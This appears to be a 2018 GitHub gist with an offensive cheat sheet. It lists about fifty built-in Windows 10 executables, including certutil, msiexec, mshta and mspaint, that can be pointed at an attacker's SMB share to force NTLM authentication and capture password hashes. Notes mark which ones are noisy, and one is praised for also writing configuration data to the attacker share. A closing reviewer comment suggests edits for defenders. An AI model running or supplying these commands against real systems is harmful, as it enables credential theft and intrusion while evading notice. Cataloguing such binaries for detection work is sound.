Created March 5, 2018 04:24

Revisions

  1. @invalid-email-address Anonymous created this gist Mar 5, 2018.
    51 changes: 51 additions & 0 deletions exes_for_NTLM_hash_capture.txt
    @@ -0,0 +1,51 @@
    Executables for Capturing Hashes (incomplete list)
    (all file locations are system32 - win10, impacket-smbserver with -smb2support used for testing)

    @0rbz_

    attrib.exe \\host\share
    bcdboot.exe \\host\share
    bdeunlock.exe \\host\share
    cacls.exe \\host\share
    certreq.exe \\host\share (noisy, pops an error dialog)
    certutil.exe \\host\share
    cipher.exe \\host\share
    ClipUp.exe -l \\host\share
    cmdl32.exe \\host\share
    cmstp.exe /s \\host\share
    colorcpl.exe \\host\share (noisy, pops an error dialog)
    comp.exe /N=0 \\host\share \\host\share
    compact.exe \\host\share
    control.exe \\host\share
    convertvhd.exe -source \\host\share -destination \\host\share
    Defrag.exe \\host\share
    DeployUtil.exe /install \\host\share
    DevToolsLauncher.exe GetFileListing \\host\share (this one's cool. will return a file listing (json-formatted) from remote SMB share...)
    diskperf.exe \\host\share
    dispdiag.exe -out \\host\share
    doskey.exe /MACROFILE=\\host\share
    esentutl.exe /k \\host\share
    expand.exe \\host\share
    extrac32.exe \\host\share
    FileHistory.exe \\host\share (noisy, pops a gui)
    findstr.exe * \\host\share
    fontview.exe \\host\share (noisy, pops an error dialog)
    fvenotify.exe \\host\share (noisy, pops an access denied error)
    FXSCOVER.exe \\host\share (noisy, pops GUI)
    hwrcomp.exe -check \\host\share
    hwrreg.exe \\host\share
    icacls.exe \\host\share
    LaunchWinApp.exe \\host\share (noisy, will pop an explorer window with the contents of your SMB share.)
    licensingdiag.exe -cab \\host\share
    lodctr.exe \\host\share
    lpksetup.exe /p \\host\share /s
    makecab.exe \\host\share
    MdmDiagnosticsTool.exe -out \\host\share (sends hash, and as a *bonus!* writes an MDMDiagReport.html to the attacker share with full CSP configuration.)
    mshta.exe \\host\share (noisy, pops an HTA window)
    msiexec.exe /update \\host\share /quiet
    msinfo32.exe \\host\share (noisy, pops a "cannot open" dialog)
    mspaint.exe \\host\share (noisy, invalid path to png error)
    mspaint.exe \\host\share\share.png (will capture hash, and display the remote PNG file to the user)
    msra.exe /openfile \\host\share (noisy, error)
    mstsc.exe \\host\share (noisy, error)
    netcfg.exe -l \\host\share -c p -i foo
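
Review bot: The test-conditions line at the top of the file records only "system32 - win10" and "impacket-smbserver with -smb2support", with no Windows 10 build number, so the results cannot be tied to a specific release; add the build that was tested. The noise annotations are also inconsistent: some entries read "(noisy, pops an error dialog)", others "(noisy, pops GUI)" or "(noisy, error)", and the unannotated entries leave open whether they ran silently or were simply not checked. A fixed marker on every entry (for example silent / dialog / window) would remove that ambiguity and make the list usable for tuning detections. Since every entry is a system32 binary handed a \\host\share UNC path, a one-line statement in the header that the common observable is outbound SMB authentication from that process would serve defenders reading the file. The two mspaint.exe entries differ only in whether a file name follows the share, which could be merged into one entry with both behaviours noted.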